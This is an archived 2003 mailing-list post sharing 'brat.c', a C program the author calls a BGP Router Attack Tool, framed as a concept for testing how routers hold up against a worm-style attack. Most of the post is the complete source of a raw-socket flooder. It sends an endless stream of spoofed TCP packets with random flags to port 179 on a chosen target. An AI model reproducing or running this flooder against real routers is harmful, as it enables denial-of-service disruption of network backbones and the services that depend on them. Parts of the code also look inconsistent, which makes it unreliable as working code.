I started doing some reading/catching up on networking, and decided to modify an old tool to tinker with BGP a bit. I was hoping I could benchmark some stuff to avoid a possible nightmare should someone decide to make a worm that attacked routers `ala` SoBigf/MSBlast. The thought I had was: "What if someone took their time and made something like that, that took time to install the necessary includes to compile a packet spoofing random generating, router attack tool. So this is what I came up with. Now I could test it on machines running zebra at home, but I don't have enough routers to make the necessary configurations for the scenario at: http://www.politrix.org/segment/brat.txt Reasons why I decided to tinker with this? Suppose someone does decide to create something that stupid (that attacks routers) what could be done being that nothing like this has ever been done on this scale (worm + dos + bgp routers with specific packet info), and it would be helpful to all admins and vendors if they could find probs beforehand and fix things up. Sure some will state, there's no prob with *X* ... Until something comes along and bites them in the *packet* so for those who have the equipment and the time for testing here's a concept program for you... /* * * brat.c (modified bubonic.c) * SoBigF concept: worm + BGP = backbone nightmare * wii sil @ efnet || sil @ disgraced . org * works find under FreeBSD 4.7-RELEASE-p3 * OSX Linux (Slackware) NetBSD OpenBSD * Shouts to Spikeman Azrael MZA pseud jhh brianh * and everyone else I asked to test with me * #unixgods <h4x0rjeet0> is this channel being sniffed? * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <strings.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, ip_v:4; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; u_char ip_ttl; u_char ip_p; u_short ip_sum; u_long saddr, daddr; }; struct tcp_hdr { u_short th_sport; u_short th_dport; u_long th_seq; u_long th_syn; u_int th_x2:4, th_off:4; u_char th_flags; u_short th_win; u_short th_sum; u_short th_urp; }; struct tcpopt_hdr { u_char type; u_char len; u_short value; }; struct pseudo_hdr { u_long saddr, daddr; u_char mbz, ptcl; u_short tcpl; }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short bgport, bgsize, pps; u_long radd; u_long sradd; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname); fprintf(stderr, "Ports are set to send and receive on port 179\n"); fprintf(stderr, "dst:\tDestination Address\n"); fprintf(stderr, "src:\tSource Address\n"); fprintf(stderr, "size:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru routes\n"); fprintf(stderr, "num:\tpackets\n\n"); exit(1); } inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s fucknut\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 100; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0; /* could have set to random and let that find something */ packet.ip.ip_id = radd; packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = random(); packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = radd; packet.tcp.th_flags = 0; packet.tcp.th_win = 65535; packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 0; packet.tcp.th_urp = 0; packet.tcp.th_dport = 179; cksum.pseudo.daddr = sradd; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = random(); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = sradd; s_in.sin_port = 179; for(i=0;;++i) { if( !(i&31337) ) { packet.tcp.th_sport = 179; cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd; packet.tcp.th_flags = random(); packet.tcp.th_ack = random(); } else { packet.tcp.th_flags = rand(); packet.tcp.th_ack = rand(); } ++packet.ip.ip_id; /*++packet.tcp.th_sport*/; ++packet.tcp.th_seq; if (!bgport) s_in.sin_port = packet.tcp.th_dport = 179; packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0); } } int main(int argc, char *argv[]) { int on = 1; printf("brat.c -- BGP Router Attack Tool\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nFinding host\n"); fflush(stdout); radd = lookup(argv[1]); bgport = atoi(argv[3]); bgsize = atoi(argv[4]); sradd = lookup(argv[2]); printf("Silly rabbit Politrix are for kids\n"); flooder(); return 0; } ================================================= J. Oquendo rsvp: segment ... antioffline . com PGP Fingerprint 39A7 24C6 A9A0 6C67 96CA 0302 F1D3 2420 851E E3D0 http://www.politrix.org http://www.antioffline.com ================================================= -- __________________________________________________________ Sign-up for your own personalized E-mail at Mail.com http://www.mail.com/?sr=signup CareerBuilder.com has over 400,000 jobs. Be smarter about your job search http://corp.mail.com/careers
This archive was generated by hypermail 2b30 : Mon Aug 25 2003 - 22:15:42 PDT